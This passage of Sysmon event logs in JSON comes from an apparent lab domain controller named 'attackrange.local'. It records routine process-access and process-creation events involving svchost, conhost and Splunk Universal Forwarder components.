System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010A72A1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010A72A1000}","TargetProcessId":"4372","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.178\r\nSourceProcessGUID: {41C8662E-22D0-5F25-0000-001017A01100}\r\nSourceProcessId: 4372\r\nSourceThreadId: 3996\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.178","SourceProcessGUID":"{41C8662E-22D0-5F25-0000-001017A01100}","SourceProcessId":"4372","SourceThreadId":"3996","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.680\r\nProcessGuid: {41C8662E-22D0-5F25-0000-00101CA21100}\r\nProcessId: 2992\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.680","ProcessGuid":"{41C8662E-22D0-5F25-0000-00101CA21100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-0010EF1C1100}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-0010EF1C1100}","TargetProcessId":"2992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-0010EF1C1100}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-0010EF1C1100}","TargetProcessId":"2992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\